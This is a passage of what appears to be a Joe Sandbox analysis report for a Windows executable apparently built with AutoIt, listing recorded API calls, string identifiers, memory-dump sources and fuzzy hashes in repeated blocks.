                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                        • Opcode ID: e991db85c2120cb715d3a56134a30f4c2452efc08de67c73540aeb8718eb3c1a
                                                                                                                        • Instruction ID: 8f3ff5fb939b1c1ab67d5cd3a5d7e6b0496b07c2bd8a071084e9189c39f1026e
                                                                                                                        • Opcode Fuzzy Hash: e991db85c2120cb715d3a56134a30f4c2452efc08de67c73540aeb8718eb3c1a
                                                                                                                        • Instruction Fuzzy Hash: E031A471500204AEEB12AF78CC80FFB77B9FF48724F10851AF995D7190DA36A891D760
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FE2E00
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FE2E3B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        • Opcode ID: 232ca3461dba9b393b12556d637dccc22768684ee206e9a8c849b21cfc587a65
                                                                                                                        • Instruction ID: 280c27e6d9668a58c5c5740a401420b6019ceb7135c838c5f5858fab1f000bee
                                                                                                                        • Opcode Fuzzy Hash: 232ca3461dba9b393b12556d637dccc22768684ee206e9a8c849b21cfc587a65
                                                                                                                        • Instruction Fuzzy Hash: 5631F571A00355ABEB748F4ADC85BAEBBBDFF05360F144069E985961A0FB709940EB10
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 010069D0
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010069DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: Combobox
                                                                                                                        • API String ID: 3850602802-2096851135
                                                                                                                        • Opcode ID: ac4461e94a5eeeadc349588e8c54c9c97e8ecdb35b61724e7806bf1d62473f68
                                                                                                                        • Instruction ID: badfbb07f7bcde33d3e3062addc3b6a31e7f0172737a5511b2b5d9fefe827cdb
                                                                                                                        • Opcode Fuzzy Hash: ac4461e94a5eeeadc349588e8c54c9c97e8ecdb35b61724e7806bf1d62473f68
                                                                                                                        • Instruction Fuzzy Hash: A61193716002096FFF639E18CC80EEB37AFEB893A4F110125F998972D1D6769C6197A0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F81D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F81D73
                                                                                                                          • Part of subcall function 00F81D35: GetStockObject.GDI32(00000011), ref: 00F81D87
                                                                                                                          • Part of subcall function 00F81D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F81D91
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 01006EE0
                                                                                                                        • GetSysColor.USER32(00000012), ref: 01006EFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                        • Opcode ID: dc8933491efb70d77cfbae35d7ccfe07560c47c1a30430224139521daf509294
                                                                                                                        • Instruction ID: 25d258f419ee7d9bc7b0abb6bb92e7ce7d5ca46278c2d03a115338b80c69f76d
                                                                                                                        • Opcode Fuzzy Hash: dc8933491efb70d77cfbae35d7ccfe07560c47c1a30430224139521daf509294
                                                                                                                        • Instruction Fuzzy Hash: 7E212C7251020AAFEB15DFA8CD45AFA7BF9FB09314F004619F995D3180E635E861DB50
                                                                                                                        APIs
                                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 01006C11
                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01006C20
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                        • String ID: edit
                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                        • Opcode ID: 98c521ccc79fc5d4cfca6d9ba1a54eedeefabd833ce444c2c622e8f76b5bfc4a
                                                                                                                        • Instruction ID: 85bf99682e3136043bb59c93158e8c070bf7675c4dbcb0dc4ee6daa6681d6b66
                                                                                                                        • Opcode Fuzzy Hash: 98c521ccc79fc5d4cfca6d9ba1a54eedeefabd833ce444c2c622e8f76b5bfc4a
                                                                                                                        • Instruction Fuzzy Hash: AA11BFB1500208ABFB629E68DC41EFB37AAEB05378F104714F9A1971D0C777DCA19B60
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FE2F11
                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FE2F30
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                        • Opcode ID: c1691accf92c51486e3c7853f762f46611017c23585d9395901ce56d899b3c41
                                                                                                                        • Instruction ID: 92048f09aedf666ec3d39f09fbf9022792ade98883caa01359fff48e10f3bd39
                                                                                                                        • Opcode Fuzzy Hash: c1691accf92c51486e3c7853f762f46611017c23585d9395901ce56d899b3c41
                                                                                                                        • Instruction Fuzzy Hash: E811E672E012A4ABDB64DA59DC44BAD77BDEB02324F0400A5E844A72A0F7B1AD04E791
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FF2520
                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FF2549
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                        • String ID: <local>
                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                        • Opcode ID: 2b7694f9183171575817cb4d27db667a7e015fc1a9b606a69c93a47d2983398d
                                                                                                                        • Instruction ID: 0edcc93d81a9a1d2fc8d1553daab3a89b7883b87f641f2fb032f25846c58dcf7
                                                                                                                        • Opcode Fuzzy Hash: 2b7694f9183171575817cb4d27db667a7e015fc1a9b606a69c93a47d2983398d
                                                                                                                        • Instruction Fuzzy Hash: 1E1106B150122ABADB24CF518C99FBBFF6CFF05761F14812AF64587014D2705941E6F0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FF830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00FF80C8,?,00000000,?,?), ref: 00FF8322
                                                                                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00FF80CB
                                                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 00FF8108
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                        • String ID: 255.255.255.255
                                                                                                                        • API String ID: 2496851823-2422070025
                                                                                                                        • Opcode ID: 30bcd9dbd5b4e4a49d9c970ecf3b29b2789894b03194bafb1c2bd8fc765736e4
                                                                                                                        • Instruction ID: 2cc8b8be56accc46a8ccb745dbe56029222de0a82f6656681f0fc3008696c9c7
                                                                                                                        • Opcode Fuzzy Hash: 30bcd9dbd5b4e4a49d9c970ecf3b29b2789894b03194bafb1c2bd8fc765736e4
                                                                                                                        • Instruction Fuzzy Hash: 9011E135600209ABDB20AF64CC86FFDB768FF04760F108617EA11972A1DB76A802E795
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 00FDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDB0E7
                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FD9355
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                        • Opcode ID: 7611531da9dcea6e16bb3409bf5314c825cb3db7e035cdfef90a4a947d01d30b
                                                                                                                        • Instruction ID: 59ff8ca46a74baaccaa8e07d07735ccb687356b9d0f5bd121b4f7c9c67d116a6
                                                                                                                        • Opcode Fuzzy Hash: 7611531da9dcea6e16bb3409bf5314c825cb3db7e035cdfef90a4a947d01d30b
                                                                                                                        • Instruction Fuzzy Hash: 5101F171A05214ABCB08FFA1CC959FE73AEBF06720B18060AF972573C1DB799808A750
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 00FDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDB0E7
                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FD924D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                        • Opcode ID: f068b15055c735019943d79358e1a8df500ab31251ec52ed420b47240082e9d4
                                                                                                                        • Instruction ID: e42b1cece10b56dbc7a65b454f4ea7c7110f93e541d643595dafc8d3fee8d377
                                                                                                                        • Opcode Fuzzy Hash: f068b15055c735019943d79358e1a8df500ab31251ec52ed420b47240082e9d4
                                                                                                                        • Instruction Fuzzy Hash: D001D871A4520477CB14FBE1CC96EFF73AD9F45700F18001A751267281DA599F08A3A1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                          • Part of subcall function 00FDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDB0E7
                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FD92D0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                        • Opcode ID: 8e262291976091e3917d9b682c8e84d71931c454f7c5693c627dcb0bbab030ce
                                                                                                                        • Instruction ID: 583cc4e3f0d3d8c8025943486a80a6ce25d3ae2c19679341b116d73377ef7be7
                                                                                                                        • Opcode Fuzzy Hash: 8e262291976091e3917d9b682c8e84d71931c454f7c5693c627dcb0bbab030ce
                                                                                                                        • Instruction Fuzzy Hash: 0C01F771A4520477CB04FAE1CC86EFF73AD9F00701F280116790263281DB699E08A3B1
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassName_wcscmp
                                                                                                                        • String ID: #32770
                                                                                                                        • API String ID: 2292705959-463685578
                                                                                                                        • Opcode ID: 4ca9c6ee480b3b341965141350161efc9435c9699211bdc991831af63e1d8485
                                                                                                                        • Instruction ID: eb5b78b2d771c7887ad87d7379903f50a54bc6a7ed7ca1d1642205c438320033
                                                                                                                        • Opcode Fuzzy Hash: 4ca9c6ee480b3b341965141350161efc9435c9699211bdc991831af63e1d8485
                                                                                                                        • Instruction Fuzzy Hash: 37E06173E0022D17D3309A9A9C45F97F7ACEB41731F00005BFD54D7000D664A94487D1
                                                                                                                        APIs
                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00FD81CA
                                                                                                                          • Part of subcall function 00FA3598: _doexit.LIBCMT ref: 00FA35A2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message_doexit
                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                                        • Opcode ID: 0156d5d5715c73f59905179d78cc0e9dca82c89137586c567ee3db3f37d34304
                                                                                                                        • Instruction ID: 43946fa0bc13d588a4bd69868199731516b70cac49c93425d2f203a86b77ff45
                                                                                                                        • Opcode Fuzzy Hash: 0156d5d5715c73f59905179d78cc0e9dca82c89137586c567ee3db3f37d34304
                                                                                                                        • Instruction Fuzzy Hash: F8D05B3638531936D22532F97C07FC6794C4B05B55F044016BB48995C38EDA95D163D9
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FBB564: _memset.LIBCMT ref: 00FBB571
                                                                                                                          • Part of subcall function 00FA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FBB540,?,?,?,00F8100A), ref: 00FA0B89
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00F8100A), ref: 00FBB544
                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F8100A), ref: 00FBB553
                                                                                                                        Strings
                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FBB54E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                        • API String ID: 3158253471-631824599
                                                                                                                        • Opcode ID: 0a13a28aba6e8dcf01d8328c2c2aad43c96015a129e3ff825145ae9850fe6628
                                                                                                                        • Instruction ID: 44b9c7e9017f01986ccc19572f5c0f1d5b0851fdde3edcd67767f71b5a66a254
                                                                                                                        • Opcode Fuzzy Hash: 0a13a28aba6e8dcf01d8328c2c2aad43c96015a129e3ff825145ae9850fe6628
                                                                                                                        • Instruction Fuzzy Hash: D2E092B46007118FD731DF69E9047827BE4AF00754F04892CE4C6C7245EBB9E408EF62
                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01005BF5
                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01005C08
                                                                                                                          • Part of subcall function 00FE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE555E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                        • Opcode ID: 0f1401ec9c6d0a8e241254b44a3fba8810bd1b793526ba850ae2b09069cb3082
                                                                                                                        • Instruction ID: 0860280fe16c5efc663259d430d17270eaa1893fb1745d565cda6014bc6b91ec
                                                                                                                        • Opcode Fuzzy Hash: 0f1401ec9c6d0a8e241254b44a3fba8810bd1b793526ba850ae2b09069cb3082
                                                                                                                        • Instruction Fuzzy Hash: D8D0C931388312B7E779AB71AC1BF977A18AB54B51F000829B785AA1C4D9E95800D750